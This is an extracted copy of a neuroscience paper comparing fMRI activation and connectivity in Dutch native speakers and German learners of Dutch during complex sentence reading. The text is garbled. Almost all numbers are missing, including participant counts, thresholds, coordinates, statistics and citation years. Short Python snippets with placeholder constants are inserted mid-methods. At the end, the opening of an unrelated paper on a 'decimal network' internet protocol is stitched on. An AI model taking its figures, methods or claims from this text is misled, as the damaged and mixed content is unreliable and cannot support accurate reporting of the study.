network processes both the first and the second language (consonni et al., ; indefrey, ; luke et al., ; perani et al., ). as indicated previously, stronger evidence for a shared syntactic system between l and l comes from a repetition suppression study in german–english late bilin- guals (weber and indefrey, ). 
the study showed that an english passive can be primed by a german passive on both the neural and the behavioral levels. therefore, it was argued that the same neuronal populations were recruited in the processing of the l and the l passive. similar be- havioral effects in language production have been found in spanish–english and dutch–english bilinguals (hartsuiker et al., ; schoonbaert et al., ). most of these studies focused on sentences with simple local dependencies. it is thus an open question whether advanced second language users process these later learned complex structures like na- tive speakers or whether they rely on different processes and representations. in the past, functional neuroimaging studies of language processing have focused on activation studies alone, trying to investigate where a certain cognitive function is localized. however, this approach does not take the dynamic inter- play between regions during cognitive tasks into account fig. . examples of complex sentence structures in german and dutch and the dependencies be- tween verbs and arguments. the structures in (a, b) are used in the present study. the structure in (a) does not exist in standard german and an embedded structure, see (c), is possible instead; (b, d) on the other hand are equivalent in ger- man and dutch. all sentences mean ‘‘jan taught anna to feed the horses.’’ weber et al. (hagoort, ). therefore, investigations of functional, task-related connectivity patterns are an important addition to elucidate the large-scale networks underlying language processing. recent studies have shown the dynamic interplay between inferior frontal and temporal regions during lan- guage processing (den ouden et al., ; griffiths et al., ; snijders et al., ). the left inferior frontal and temporal regions of the brain are thought to form the core network related to sentence and especially syntactic processing as described by several dif- ferent theories (e.g., grodzinsky and friederici, ; hagoort, ) and as evidenced, for example, by syntactic priming studies ( menenti et al., ; segaert et al., ). this functional organization appears to be realized across different languages, in closely related languages such as ger- man and dutch, as well as in less related languages such as japanese, chinese, and hebrew (see e.g., the studies listed in the supplementary materials of a recent meta-analysis of sentence-level processing, hagoort and indefrey, ). in the present study, we are going to investigate the language networks of native speakers and second language users and in- vestigate, with activation and connectivity analyses of func- tional magnetic resonance imaging (fmri) data, whether the networks overlap between the two groups. moreover, we are going to explore whether there are any overall group differ- ences in activation and connectivity patterns and, more specif- ically, whether there are any network differences between the two groups for the processing of crossed dependency struc- tures, the structure that does not exist in the first language of the second language user group (in comparison with the right-branching structure that does occur in both languages). we expect these differences to show up in the form of and increased engagement of the brain networks in l process- ing, in the sense of more activation and more connectivity (either in the form of additional network nodes or stronger connections) within the underlying networks. 
these differ- ences might occur within the traditional language networks thought to underlie sentence and, in particular, syntactic pro- cessing (i.e., left inferior frontal and left middle temporal cortex), which would indicate differences in the nature of the second language networks, or in other nontraditional re- gions that are, for example, linked to cognitive control mech- anisms on the language network (such as prefrontal or parietal regions of the brain). materials and methods participants we tested dutch native speakers ( females) and german native speakers ( females). four of the german participants (three females) were subsequently excluded as they did not meet our criteria concerning their language background or due to technical malfunction during scanning. one dutch native speaker was excluded from the analyses as the condition triggers were not recorded correctly. the ger- man native speakers all went to university in the nether- lands and had started learning dutch after the age of . they had all passed the dutch nt staatsexamen, a language test that allows university entry and shows a high-proficiency level in dutch. all participants were right-handed and had no history of neurological impairments. they all had normal or corrected-to-normal vision. the participants received course credits or money for their participation in the experiment. all participants gave written informed consent before the study started and the study was conducted according to institu- tional guidelines of the local ethics committee (cmo proto- col region arnhem-nijmegen, the netherlands) and in accordance with the declaration of helsinki. stimuli and experimental design the experimental stimuli consisted of crossed dependency sentences and right-branching structures with similar seman- tic content (fig. a, b). the study was originally designed as a syntactic priming experiment in which crossed dependency structures were primed (syntactic priming trial: prime: crossed dependency structure, target: crossed dependency structure; no syntactic priming trial: prime: right-branching structure, target: crossed dependency structure). this was fully crossed with a verb repetition manipulation. the main verbs used in the sentences were helpen (to help) and leren (to teach) (crossed dependency structures in dutch are re- stricted to a very limited set of main verbs [zwart, ] and we thus used only two). instead of comparing target sentences as in the original analysis, here we look at the orthogonal contrasts of crossed dependency and right-branching prime sentences. given the design, we thus have equal numbers ( ) of crossed depen- dency and right-branching sentences and an even distribution of the two verbs. the original description of the design can be found in weber ( ). moreover, to hide the priming manipulation and make the sentences less predictable, an equivalent amount of passive and active filler trials, as well as right-branching filler trials, was also presented to the par- ticipant interspersed with the priming trials. as a baseline condition, miniblocks of, in total, sentence format conso- nant strings after every sentences were presented as well. four stimulus lists were created. across these stimulus lists, each target occurred in a prime and a no-prime trial and each sentence’s content appeared in the prime as well as target po- sition. each participant was presented with only one of the stimulus lists. 
the experiment consisted of three experimen- tal sessions; participants had a short break between sessions. right-branching and crossed dependency sentences are not equal in numbers of words as the right-branching sen- tence has an additional word, te (fig. ). moreover, an addi- tional manipulation of the sentences that was originally conceived to ensure that syntactic priming effects cannot be explained by overlap in length between crossed depen- dency sentences, but no overlap with right-branching sen- tences, introduced an additional adjective in the second noun phrase of right-branching sentences (thus making these always words long) as well as in the crossed depen- dency target sentences (thus words long). no additional adjectives were introduced in crossed dependency prime sen- tences; these were thus nine words long. thus, our present comparison between right-branching and crossed dependency structures is confounded by length ( versus words) and additional adjectives in one condi- tion. however, given our hypothesis, we are only interested in the interaction between participant group and type of structure as well as the main difference between groups, con- trasts that should only be affected by this confound between the type of structures if the sentence length per se was pro- cessed differently in the two groups, which is unlikely. brain networks in second language users fmri experimental procedure the experiments were run using presentation software (neurobehavioral systems, www.neuro-bs.com). partic- ipants lay in the scanner and looked at a screen through a mirror. sentences were presented in white arial font of size on a black background and participants were instructed to read the sentences silently in their head. crossed dependency sentences were presented in these fragments: ‘‘de muzikant/ heeft/de tiener/de fluit/leren/spelen’’ (the musician has the teenager the flute teach play.) and right-branching sentences in these: ‘‘de muzikant/heeft/de tiener/geleerd/de fluit/te spelen’’ (the musician has the teenager taught the flute to play.). sentence fragments were presented one by one at a fixed presentation rate that depended on the length of the fragment, both right-branching and crossed dependency sentences were presented in six fragments (while the number of words differed, see previous section). the fragment duration in msec was computed as ([number of letters in the fragment · msec] + msec), a method based on nieuwland and van berkum ( ). during the in- terstimulus interval (between sentences), a fixation cross was displayed. the length of the interval was jittered between . and . sec. in . % of the nontarget experimental sen- tences and one third of the filler sentences, a word appeared in a larger font size; these trials were not included in the current analysis. subjects had to respond to this change by pressing a button. fmri data acquisition and analysis the fmri data were acquired on a . tesla siemens avanto scanner. a functional t *-weighted epi-bold fmri scan was performed (tr = . sec, te = msec), with a flip angle of �. we acquired slices with a voxel size of . · . · mm with a . -mm gap. the field of view was · · . mm. the slices were acquired in an ascending order. it was made sure that the field of view included inferior parts of frontal and temporal cortex. in some subjects, parts of the top of the brain were outside the field of view. the anatomical images were acquired using a t -weighted sequence. 
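the word-length-dependent presentation rate described above can be written as a one-line function; the two constants are placeholders, since the per-letter and base durations are not recoverable from the text, and the fragments below are the example stimuli quoted above.

```python
MS_PER_LETTER = 50  # placeholder: the actual per-letter duration is not given above
BASE_MS = 300       # placeholder: the actual base duration is not given above

def fragment_duration_ms(fragment: str) -> int:
    """Presentation duration of one fragment: letters * per-letter time + base time."""
    n_letters = sum(ch.isalpha() for ch in fragment)
    return n_letters * MS_PER_LETTER + BASE_MS

for fragment in ["de muzikant", "heeft", "de tiener", "de fluit", "leren", "spelen"]:
    print(fragment, fragment_duration_ms(fragment), "ms")
```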
the fmri data were prepro- cessed and analyzed at the first level using spm (www.fil.ion.ucl.ac.uk/spm/). second-level analyses were run using spm . the first five images were discarded to ensure that transient nonsaturation effects did not affect the analysis. the functional images were checked for spikes and if any were detected these images were removed and a replacement image was created based on the surrounding images. all functional images were real- igned and slice-time corrected. the participants’ anatomical t images were coregistered to the mean functional image. the anatomical t images were then segmented into gray and white matter and the spatial normalization parameters were taken to normalize the functional images. functional images were smoothed with a -mm full-width at half max- imum gaussian kernel. for the fmri activation analysis, we first defined the con- trasts of interest for each subject. these were then taken to the second level for a random-effects group analysis. con- nectivity analyses were run using the generalized psycho- physiological interaction (gppi) toolbox ( mclaren et al., ). as for the activation analysis, as per psychophysio- logical interaction analysis (thus per seed), we first defined the contrasts of interest for each subject. these were then taken to the second level for a random-effects group analysis. first-level single-subject model activation for the activation analyses, we created a design matrix for each participant that included for each of the three sessions, regressors for each type of sentence structure and the sentence format consonant strings, as well as the fixation cross. the ac- tual event duration was modeled and realignment parameters for movement correction were added to the model. in addition, additional regressors were entered to covary for excessive movement at time points where composite motion was > mm. these covariates were created using the art toolbox ( mozes and whitfield-gabrieli, ; www.nitrc.org/ projects/artifact_detect/). on average, the additional regres- sors were added for < % of the time points. we then defined three different contrasts per subject, the crossed dependency sentences, the right-branching sentences, and both these complex sentence structures, all against the baseline of sen- tence format consonant strings. these contrasts were taken to the second level for a random-effects group analysis. first-level single-subject model connectivity we also carried out task-related connectivity analyses from seeds that were defined based on second-level activa- tion analyses. more specifically, based on the first six peaks of activation from the conjunction of complex sen- tences across the two groups (table ), we defined -mm spheres that were used as seeds for a gppi analysis ( mclaren et al., ). these seeds were located in the left inferior frontal gyrus, left temporal pole, left anterior middle tempo- ral gyrus, left middle temporal gyrus, left posterior middle temporal gyrus, and left inferior temporal gyrus. for each seed region and subject, we built a design matrix consisting of the following regressors: ( ) regressors for each condition, mirroring the activation model; ( ) a regressor for the overall activity in the seed region; and ( ) regressors de- scribing the modulation of activity from the seed region to the rest of the brain for each of the conditions (psychophys- iological interactions). moreover, the same regressors for movement correction as for the activation models were used. 
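the structure of this seed-level design matrix can be sketched in a few lines. the toy code below builds the three kinds of regressors just listed (condition regressors, the overall seed time course, and one interaction regressor per condition) with numpy and pandas. it is a conceptual illustration only: the actual analysis used spm and the gppi toolbox, which additionally deconvolve the seed signal to a neural-level estimate and convolve the interaction terms with the hemodynamic response function, steps omitted here; the number of volumes and the toy block timings are placeholders.

```python
import numpy as np
import pandas as pd

n_vols = 200  # placeholder number of volumes per session
rng = np.random.default_rng(0)
seed_ts = rng.standard_normal(n_vols)  # stand-in for the mean signal of one seed sphere

# 0/1 condition time courses; in the real model these come from the event timings
conditions = {
    "crossed_dependency": np.zeros(n_vols),
    "right_branching": np.zeros(n_vols),
    "consonant_strings": np.zeros(n_vols),
}
conditions["crossed_dependency"][20:30] = 1
conditions["right_branching"][60:70] = 1
conditions["consonant_strings"][100:110] = 1

design = {"seed": seed_ts}  # (2) overall activity in the seed region
for name, boxcar in conditions.items():
    design[name] = boxcar   # (1) one regressor per condition
    # (3) psychophysiological interaction: seed activity modulated by the condition
    design["ppi_" + name] = (seed_ts - seed_ts.mean()) * boxcar

design_matrix = pd.DataFrame(design)
print(design_matrix.head())
```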
the actual event duration was modeled. we again de- fined three different contrasts of interests to be taken into the second-level group analysis: the modulation of activity from the seed region for crossed dependency sentences, right- branching sentences, and both complex sentences against sentence format consonant strings. second-level model activation to investigate overlap and differences in activation pat- terns between the two groups, we built two different second- level models. first, we built a flexible factorial model with the factors group (second language user; native speaker), type of sentences (crossed dependency or right branching), and subject in which we modeled both main effects and the interaction. second, a simple between-groups t-test com- pared complex sentences versus sentence format consonant strings across the two groups. this was built as an additional model to be able to look at the main effect of the group, which is not correctly estimated in the flexible factorial weber et al. table . activation and connectivity effects of the conjunction of sentences versus consonant strings contrast between the two groups region cluster size x/y/z ba area pfwe (cluster) pfwe (peak) t activations left middle temporal gyrus a � � / . . . left middle temporal gyrus (anterior) a � � � . . left medial temporal pole a � � . . left inferior temporal gyrus a � � � . . left middle temporal gyrus (posterior) a � � . . left inferior frontal gyrus orbitalis/triangularis a � � / . . left hippocampus � � � . . left fusiform gyrus � � � . . left rolandic operculum � . . left inferior frontal gyrus triangularis � . . left superior temporal gyrus � � . . left insula � � . . right middle temporal gyrus � . . . right middle temporal pole � . . right middle/superior temporal gyrus � � . . right (para)hippocampal gyrus � � . . . left cerebellum � � . . . left precentral gyrus � � . . . left calcarine gyrus � � . . . cuneus � . . right cerebellum � � . . . right precentral gyrus � . . . ( ) connectivity from left inferior frontal gyrus left anterior superior temporal gyrus/left temporal pole � � . . . left inferior occipital gyrus � � � . . . right inferior frontal cortex/insula . . . left fusiform gyrus � � � . . . ( ) connectivity from left temporal pole cerebellar vermis (lobule vi) � � . . . left lingual gyrus � � � . . ( ) connectivity from left anterior temporal gyrus right inferior frontal gyrus (opercularis) . b . . left middle temporal gyrus � � . b . . left fusiform gyrus � � � . b . . left middle occipital gyrus � � . . left lingual gyrus � � � . . left superior occipital gyrus � � . b . . right superior occipital gyrus � . b . . right inferior occipital gyrus � . . right middle occipital gyrus � . . right inferior occipital gyrus � � . . left fusiform gyrus � � . . left anterior/middle cingulate cortex � . b . . right cerebellum � � . . . left inferior frontal gyrus (orbitalis) � � . . . ( ) left middle temporal gyrus left anterior middle temporal gyrus � � � / . b . . ( ) left posterior middle temporal gyrus left inferior parietal cortex � � . . . right middle temporal gyrus � . b . . right middle occipital gyrus � . . left fusiform gyrus � � � . b . . left hippocampus � � . . . left middle occipital gyrus � � . b . . left inferior occipital gyrus � � � . . right hippocampus � . . . left middle occipital gyrus � � . . . ( ) left inferior temporal gyrus n.s. effects are reported at a peak-level threshold of p < . uncorrected, pfwe < . 
at the cluster level, and all peaks within a cluster > mm apart. a indicates that this peak was taken as a seed for the connectivity analysis. b ppi results that survive a more stringent cluster-level-corrected threshold of pfwe < . (to control for the six different seeds investigated). ba, brodman area; fwe, family-wise error; n.s., not significant; ppi, psychophysiological interaction. design. we then looked at the following contrasts: (a) the common patterns of activation for second language users and native speakers for complex sentences versus sentence format consonant strings as revealed by a conjunction be- tween the group contrasts; (b) the differences between the two groups in processing complex sentences versus sentence format consonant strings; (c) the interaction between type of sentence structure and group. the conjunction analysis was performed using spms of the minimum t-statistic over two orthogonal contrasts. inference was based on p-values adjusted for the search volume using the random field theory (friston et al., ). second-level model connectivity for the second-level connectivity analysis, we built similar models. for each seed region, we built both a sim- ple between-groups t-test and a flexible factorial model. these modeled the same conditions as for the activa- tion analysis, but on the psychophysiological interaction regressors. for the activation as well as the connectivity analyses, we report whole-brain effects at a conservative voxel- level threshold of p < . , family-wise error (fwe) cor- rected at the cluster level for multiple comparisons ( p < . ). as we conduct connectivity analyses for six different seed regions, we also report which cluster-level p-values survive a stricter cluster-level threshold of pfwe < . (tables and ). all reported coordinates are in montreal neurological institute space. results performance behavioral task participants were attending to the sentences as evidenced by the performance on the behavioral task. the german na- tive speaker group spotted % (standard deviation [sd] = %) of target items in larger font size and the dutch native speaker group % (sd = %). activation (a) conjunction (common pattern of activation across groups): the two-participant groups showed common patterns of activation for complex sentences versus consonant strings across widespread areas of a typical language network (fig. and table ), including left and right middle temporal cortices (on the left from very posterior parts of the temporal cortex close to oc- cipital areas all the way to the anterior temporal pole; on the right in more anterior regions only), left inferior frontal gyrus, as well as left pre/postcentral gyrus, and left and right hippocampus. (b) main effect of group: there were no differences be- tween the two groups in their activation patterns for complex sentences versus consonant strings. (c) the interaction between type of sentence structure and group: there were no differences in the processing of the two types of sentence structures between the two groups. connectivity seed in the left inferior frontal gyrus (a) conjunction (common pattern of activation across groups): the task-related functional connectivity analysis from the seed in left inferior frontal gyrus showed enhanced connectivity to left occipital cortex table . activation and connectivity effects for the main effect of group region cluster size x/y/z ba area pfwe (cluster) pfwe (peak) t activations n.s. 
( ) ppi from seed in left inferior frontal gyrus left intraparietal sulcus � � < . a . . left precentral gyrus � � . . . left supramarginal gyrus � � / . . . left middle occipital gyrus extending into the left intraparietal sulcus � � . a . . left thalamus � � . . . ( – ) ppi from seeds in left temporal pole, left anterior, and middle temporal lobe n.s. ( ) ppi from seed in left posterior superior/middle temporal gyrus left intraparietal sulcus � � . . . ( ) ppi from seed in left inferior temporal gyrus n.s. in all cases, the second language user group > native speaker group, no significant effects for the reverse contrast. effects are reported at a peak-level threshold of p < . uncorrected, pfwe < . at the cluster level, and all peaks within a cluster > mm apart. a ppi results that survive a more stringent cluster-level-corrected threshold of pfwe < . (to control for the six different seeds investigated). we used this conservative threshold as the current analysis is a reanalysis of a dataset. however, we want to note that no additional group differences in the activation or connectivity analyses appear at a less conservative voxel-level threshold of p < . , fwe ( p < . ) corrected at the cluster level. weber et al. and left anterior temporal cortex and right inferior frontal cortex for complex sentences compared with consonant strings for both groups, but these effects did not survive the stricter cluster-level threshold of pfwe < . (fig. and table ). (b) main effect of group: the second language user group additionally showed enhanced connectivity to left in- ferior parietal regions and the left middle occipital gyrus (fig. and table ), additional group differ- ences in the left precentral gyrus, left supramarginal gyrus, and the left thalamus did not survive the stricter cluster-level threshold of pfwe < . . (c) the interaction between type of sentence structure and group: there were no interaction effects. seed in the left temporal pole (a) conjunction (common pattern of activation across groups): the task-related functional connectivity analysis from the seed in the left temporal pole showed enhanced connectivity to the lingual gyrus and the cerebellum for complex sentences compared with consonant strings for both groups. these effects did not survive the stricter cluster-level threshold of pfwe < . (table ). (b) main effect of group: there were no differences be- tween the groups. (c) the interaction between type of sentence structure and group: there were no interaction effects. seed in left anterior middle/superior temporal gyrus (a) conjunction (common pattern of activation across groups): the task-related functional connectivity anal- ysis from the seed in the left anterior temporal lobe showed enhanced connectivity to regions of the lan- guage network from inferior frontal gyrus to posterior temporal cortex as well as occipital cortex gyrus for complex sentences compared with consonant strings for both groups. most of these connectivity effects sur- vived the stricter threshold (table and fig. ). (b) main effect of group: there were no differences be- tween the groups. (c) the interaction between type of sentence structure and group: there were no interaction effects. seed in left middle/superior temporal gyrus (a) conjunction (common pattern of activation across groups): the seed in left middle temporal gyrus was coupled to a slightly more anterior left middle temporal region for sentences compared with sentence format consonant strings for both groups (table and fig. ). 
(b) main effect of group: there were no differences between the groups. (c) the interaction between type of sentence structure and group: there were no interaction effects.

seed in left posterior middle/superior temporal gyrus

(a) conjunction (common pattern of activation across groups): enhanced connectivity to sentences compared with consonant strings from a seed in left posterior temporal gyrus was found in the left angular gyrus, right inferior temporal gyrus, and the left fusiform for both groups. additional effects in the occipital gyrus and bilateral hippocampi did not survive the stricter cluster-level threshold of pfwe < . .

fig. . conjunction of patterns of activation across the two groups for the contrast of sentences versus consonant strings, voxel-level threshold p < . uncorrected, cluster-level threshold pfwe < . (table shows which of these psychophysiological interaction [ppi] effects survive a more stringent pfwe < . cluster-level threshold to correct for number of seeds investigated). bar graphs of contrast values with % confidence intervals of representative peaks are provided for illustration purposes. fwe, family-wise error. color images available online at www.liebertpub.com/brain

fig. . shared patterns of task-related connectivity across the two groups: conjunction of psychophysiological interactions from seeds in lifg, latg, lmtg, and lptg (seeds shown in blue), defined based on peaks in the activation analysis (see figure ), across the two groups for the contrast of sentences versus consonant strings, voxel-level threshold p < . uncorrected, and cluster-level threshold pfwe < . (table shows which of these ppi effects survive a more stringent pfwe < . cluster-level threshold to correct for number of seeds investigated). bar graphs of contrast values with % confidence intervals of representative peaks are provided for illustration purposes. latg, left anterior temporal gyrus; lmtg, left middle temporal gyrus; lifg, left inferior frontal gyrus; lptg, left posterior temporal gyrus. color images available online at www.liebertpub.com/brain

fig. . main effect of group (german native speaker group > dutch native speaker group) of the psychophysiological interactions from seeds in lifg and lptg (shown in blue) for the contrast of sentences versus consonant strings, voxel-level threshold p < . uncorrected, and cluster-level threshold pfwe < . (table shows which of these ppi effects survive a more stringent pfwe < . cluster-level threshold to correct for number of seeds investigated). bar graphs of contrast values with % confidence intervals of representative peaks are provided for illustration purposes. color images available online at www.liebertpub.com/brain

(b) main effect of group: the second language user group additionally showed enhanced connectivity to a left inferior parietal region, which did not survive the stricter threshold of pfwe < . (fig. and table ). (c) the interaction between type of sentence structure and group: there were no interaction effects.

seed in left inferior temporal gyrus. there were no significant connectivity effects for this seed.

discussion

summary of the results

in this study, we investigated the processing of complex dutch sentences in an activation and connectivity fmri study. we compared the brain networks of a group of dutch native speakers and a group of german native speakers with dutch as their second language during sentence processing.
the experiments revealed the following: ( ) activation and connectivity patterns to process com- plex sentences overlapped between native speakers and second language users, as revealed by conjunction analyses. ( ) the second language user group showed some addi- tional connectivity patterns, involving areas outside the traditional language network, that is, inferior pari- etal regions. connectivity and activation in the language network the current study revealed a large network of regions sim- ilar to those shown before for native (den ouden et al., ; griffiths et al., ; snijders et al., , ) and second language processing (weber and indefrey, ) for similar manipulations for simpler sentences. as expected, the core of these networks resides in the left middle temporal and infe- rior frontal cortex. in the context of sentence-level processing, these are thought to be linked to key language processing functions, namely the access to the relevant building blocks such as words, from memory and the unification of these into a coherent message-level representation both on the se- mantic and syntactic levels, respectively (hagoort, , ; tyler et al., ). not surprisingly, these areas also show enhanced connectivity during sentence processing as they have to work in consort during online processing. anatomically, these frontal and temporal areas of the lan- guage network are connected by several fiber bundles, such as the arcuate fasciculus, connecting the inferior frontal cor- tex with parts of the posterior temporal cortex, and the unci- nate, connecting frontal cortex and anterior temporal cortex (friederici and gierhan, ; hagoort, ). in addition to the key network on the left, we found additional activa- tions in the right temporal gyrus. while not typically in- volved, for example, in syntactic processing (segaert et al., ), one should keep in mind that in this study we are in- vestigating a broad contrast of (complex) sentences versus sentence format consonant strings, which thus incorporates all kinds of levels of language processing (sentence and word-level syntax and semantics, lexical processing, and control processes), which do engage these areas (hagoort, ). the involvement of a large network of areas, includ- ing those outside of left inferior frontal and temporal gyrus, is thus not surprising. both for the activation and the connectivity analyses, the vast overlap between these language networks for second language users and native speakers is evident. thus, even for highly complex and even previously unknown sentence structures, the main processing network for a second lan- guage seems to be shared with that of a native language at least at the high-proficiency level of the present l user group. this also supports the electrophysiological findings by davidson and indefrey ( ), which showed that these structures can be learned quickly. this also mirrors previous findings in the literature for simpler sentence structures (indefrey, ; luke et al., ; perani et al., ; weber and indefrey, ) and provides evidence against ideas that a second language is processed by a fundamentally different brain network. less automatic processing in second language users several areas showed increased connectivity patterns in the second language user group for processing complex sentence structures compared with the native speakers. this suggests that some additional or different mechanisms are at play to process complex sentences in a non-native language. 
the in- crease in connectivity in this group from left inferior frontal gyrus and less strongly from left posterior temporal gyrus to inferior parietal regions could potentially stem from increased cognitive demands on the multidemand and control system (duncan, ; humphreys and lambon ralph, ) when processing a second language. the observation that pro- cessing a second language, even at a high-proficiency level, could lead to increased demands on cognitive control mech- anisms has been claimed before (abutalebi et al., ; green and abutalebi, ). this suggests that there are no differ- ences in the organization of the core language machinery itself, which appears to be shared between a first and a sec- ond language just as previous research suggests (weber and indefrey, ). the differences arise in the increased demands on systems that act on the core language processing system to ensure that the task demands (efficiently parsing the sentence and get- ting to a coherent message level representation) are met. these cognitive demands increase when processing a second lan- guage and the result is an increase in connectivity in the fron- toparietal network related to top-down cognitive control and attention, as well as executive semantic decisions (humphreys and lambon ralph, ). specifically, the connectivity dif- ferences seem to be involving the left intraparietal sulcus part close to the angular gyrus, which a recent meta-analysis in which high- versus low-demand semantic tasks were con- trasted had also found (noonan et al., ) and linked to domain-general executive control demands. generally, our findings seem to indicate that the core lan- guage machinery is shared between native and second lan- guage user groups, even when processing highly complex structures that do not exist in the l users’ native language. with an increase in cognitive control, these areas can handle second language structures as effectively as an l group. the differences in brain networks are thus only in peripheral areas related to cognitive control, which are influencing the core network. we thus find no evidence for a fundamental brain networks in second language users distinction between first and second language processing, as in more procedural versus declarative processing as claimed by ullman ( a,b) or a specific difference in grammatical processing of nonlocal dependencies in a second language (clahsen and felser, ). no specific group differences for later learned structures next to investigating general differences between lan- guage processing in native speakers and second language users, we wanted to see whether there are any specific pro- cessing differences related to later learned structures that cannot be easily mapped on an existing structure from the na- tive language. at the current conservative statistical thresh- olds, we do not see any such differences indicating that later learned sentence structure can also be integrated into existing language networks in the brain. there is thus no con- crete evidence with this analysis for different language mechanisms in processing these later learned sentence struc- tures. however, subtle difference in organization within these overlapping language networks that were indicated by the repetition effects analysis of the same dataset (see weber’s ( ) phd thesis) should be further investigated in future studies. 
furthermore, future investigations should see whether the current results hold under different task con- ditions, for example, when sentence comprehension ques- tions are asked, as well as for other, less closely related language combinations. conclusion in sum, while cortical language networks, involving left inferior frontal and left middle temporal regions, largely overlapped between second language users and native speak- ers, nontraditional language areas in inferior parietal regions show connectivity differences, hinting at less automatic pro- cessing of an l , thus requiring more cognitive control. acknowledgments this research was supported by an nwo toptalent (grant no. . . ) to k.w. the authors would like to thank monique flecken for helpful feedback on the manuscript. author disclosure statement no competing financial interests exist. references abutalebi j, annoni jm, zimine i, pegna aj, seghier ml, lee- jahnke h, lazeyras f, cappa sf, khateb a. . language control and lexical competition in bilinguals: an event-related fmri study. cereb cortex : – . bach e, brown c, marslen-wilson w. . crossed and nested dependencies in german and dutch: a psycholinguistic study. lang cogn process : – . clahsen h, felser c. . how native-like is non-native lan- guage processing? trends cogn sci : – . consonni m, cafiero r, marin d, tettamanti m, iadanza a, fab- bro f, perani d. . neural convergence for language com- prehension and grammatical class production in highly proficient bilinguals is independent of age of acquisition. cortex : – . dallas a, kaan e. . second language processing of filler- gap dependencies by late learners. lang linguist compass : – . davidson dj, indefrey p. . plasticity of grammatical recur- sion in german learners of dutch. lang cogn process : – . den ouden d-b, saur d, mader w, schelter b, lukic s, wali e, timmer j, thompson ck. . network modulation during complex syntactic processing. neuroimage : – . duncan j. . the multiple-demand ( md) system of the pri- mate brain: mental programs for intelligent behaviour. trends cogn sci : – . friederici ad, gierhan sme. . the language network. curr opin neurobiol : – . friston kj, penny wd, glaser de. . conjunction revisited. neuroimage : – . green dw, abutalebi j. . language control in bilinguals: the adaptive control hypothesis. j cogn psychol (hove) : – . griffiths jd, marslen-wilson wd, stamatakis ea, tyler lk. . functional organization of the neural language system: dorsal and ventral pathways are critical for syntax. cereb cortex : – . grodzinsky y, friederici ad. . neuroimaging of syntax and syntactic processing. curr opin neurobiol : – . hagoort p. . on broca, brain, and binding: a new frame- work. trends cogn sci : – . hagoort p. . nodes and networks in the neural architecture for language: broca’s region and beyond. curr opin neuro- biol : – . hagoort p, indefrey p. . the neurobiology of language be- yond single words. annu rev neurosci : – . hartsuiker rj, pickering mj, veltkamp e. . is syntax separate or shared between languages?: cross-linguistic syntactic prim- ing in spanish-english bilinguals. psychol sci : – . humphreys gf, lambon ralph ma. . fusion and fission of cognitive functions in the human parietal cortex. cereb cor- tex : – . indefrey p. . a meta-analysis of hemodynamic studies on first and second language processing: which suggested differ- ences can we trust and what do they mean? lang learn : – . kaan e, vasić n. . 
cross-serial dependencies in dutch: test- ing the influence of np type on processing load. mem cognit : – . luke k-k, liu h-l, wai y-y, wan y-l, tan lh. . func- tional anatomy of syntactic and semantic processing in lan- guage comprehension. hum brain mapp : – . mclaren dg, ries ml, xu g, johnson sc. . a generalized form of context-dependent psychophysiological interactions (gppi): a comparison to standard approaches. neuroimage : – . menenti l, gierhan sm, segaert k, hagoort p. . shared language: overlap and segregation of the neuronal infrastruc- ture for speaking and listening revealed by functional mri. psychol sci : – . nieuwland ms, van berkum jja. . individual differences and contextual bias in pronoun resolution: evidence from erps. brain res : – . noonan ka, jefferies e, visser m, lambon ralph ma. . going beyond inferior prefrontal involvement in semantic control: evidence for the additional contribution of dorsal an- gular gyrus and posterior middle temporal cortex. j cogn neurosci : – . weber et al. nowak ma, komarova nl, niyogi p. . computational and evolutionary aspects of language. nature : – . perani d, paulesu e, galles ns, dupoux e, dehaene s, betti- nardi v, cappa sf, fazio f, mehler j. . the bilingual brain. proficiency and age of acquisition of the second lan- guage. brain : – . schoonbaert s, hartsuiker rj, pickering mj. . the repre- sentation of lexical and syntactic information in bilinguals: evidence from syntactic priming. j mem lang : – . sebastian r, laird a, kiran s. . meta-analysis of the neural representation of first language and second language. appl psycholinguist : – . segaert k, menenti l, weber k, petersson km, hagoort p. . shared syntax in language production and language comprehension—an fmri study. cereb cortex : – . snijders tm, petersson km, hagoort p. . effective connec- tivity of cortical and subcortical regions during unification of sentence structure. neuroimage : – . snijders tm, vosse t, kempen g, van berkum jja, petersson km, hagoort p. . retrieval and unification of syntactic structure in sentence comprehension: an fmri study using word-category ambiguity. cereb cortex : – . stromswold k, caplan d, alpert n, rauch s. . localization of syntactic comprehension by positron emission tomogra- phy. brain lang : – . tyler lk, marslen-wilson wd, randall b, wright p, dever- eux bj, zhuang j, papoutsi m, stamatakis ea. . left inferior frontal cortex and syntax: function, structure and behaviour in patients with left hemisphere damage. brain : – . uddén j, ingvar m, hagoort p, petersson km. . implicit ac- quisition of grammars with crossed and nested non-adjacent dependencies: investigating the push-down stack model. cogn sci : – . ullman mt. a. the neural basis of lexicon and grammar in first and second language: the declarative/procedural model. bilingualism lang cogn : – . ullman mt. b. a neurocognitive perspective on language: the declarative/procedural model. nat rev neurosci : – . ullman mt. . is broca’s area part of a basal ganglia thala- mocortical circuit? cortex : – . weber k. . the language learning brain: evidence from sec- ond language learning and bilingual studies of syntactic pro- cessing. phd, radboud university, nijmegen. weber k, indefrey p. . syntactic priming in german–en- glish bilinguals during sentence comprehension. neuroimage : – . zwart j-w. . verb clusters in continental west germanic dialects. in: black jr, motapanyane v (eds.) microparamet- ric syntax and dialect variation. 
amsterdam/philadelphia, pa: john benjamins publishing company; pp. – . address correspondence to: kirsten weber max planck institute for psycholinguistics p.o. box ah nijmegen the netherlands e-mail: kirsten.weber@mpi.nl brain networks in second language users international journal of advanced network, monitoring and controls volume , no. , doi: . /ijanmc- - discussion on decimal network based on ipv hu shun guilin university of electronic technology xu dongmei, gao lin china institute of electronic technology standardization abstract—this paper introduces the core technology of decimal network digital domain name and ipv protocol family, and analyzes the technical characteristics of decimal network. three kinds of common network transition techniques are listed, and various problems of decimal network application are discussed. keywords-decimal network; digital domain names; ipv i. introduction tcp/ip network architecture and protocol standards in recent years, computer network research and application of hot technology. at present, the widely used ip protocol is ipv , based on which the internet has become the largest computer network system in the world. however, with the rapid development of economic globalization and modern communication technology and network, the scale of computer network is expanding rapidly, and ipv protocol starts to expose various problems. such as: ip address resources, address allocation efficiency is low, no consideration of confidential transmission. facts show that ipv cannot meet the requirements of future internet development. in this context, countries around the world have stepped up the work of the next generation of internet protocols. ipv has been selected as an international standard by the internet engineering task force (ietf), while ipv proposed in was abandoned by the etf due to its large address. later, with the introduction of digital domain name system (ddns), gradually developed into a -bit address ipv decimal network with china's independent intellectual property rights. ii. digital domain name technology the so-called digital domain name, refers to the arabic numerals ( ~ ) as the 